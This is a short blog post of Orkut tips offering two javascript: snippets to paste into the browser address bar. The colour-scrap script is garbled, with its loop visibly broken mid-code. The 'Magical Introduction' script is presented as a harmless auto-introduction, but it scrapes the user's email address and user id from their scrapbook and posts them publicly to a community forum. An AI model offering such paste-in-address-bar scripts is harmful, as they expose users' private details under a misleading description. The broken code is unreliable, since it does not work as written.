More Orkut Tips

Write a color scrap
Write the message in the message box of scrapbook or community forum. DO NOT PRESS SUBMIT.
Paste the following code in the url bar of the browser.
javascript:cor=new Array('aqua','blue','fuchsia','gold','gray','green','lime','maroon','navy','olive','orange','pink','purple','red','silver','teal','violet', 'yellow' );var z=0;txt=document.getElementsByTagName('textarea')[0];txt.value=txt.value.replace(/(.)/gi,"§$1");txt.value=txt.value.replace(/\§ /gi," ");for(y=0;yalue=txt.value.replace(/\§/,'['+cor[z]+']');z++;if(z==cor.length){z=0}}void(0)
Hit ENTER.

Magical Introduction
Just paste the script in your address bar and press Enter, and you will Introduce your self automatically.

javascript:var xml = new XMLHttpRequest();xml.open("GET","/Scrapbook.aspx",false);xml.send(null);if(xml.readyState == 4 || xml.status == 200){a = xml.responseText;s = a.match ('My scrapbook (.*)')[1];h=a.match('(.*)<\/b><\/span>')[1];i=a.match('uid=(.*)&na')[1];f= "I have " +s +" Scraps \nMy Email Is " + h +"\nMy uid is " + i;cmm=location.href.match(/cmm=\d*/);tid=location.href.match(/tid=\d*/);a=document.forms[1];a.action='/CommMsgPost.aspx?'+cmm+'&'+tid+'&subjectText=My%20Introduction:&bodyText='+encodeURIComponent(f)+'&Action.submit';a.submit();}else{alert("Error: "+xml.status)};void(57)

No comments: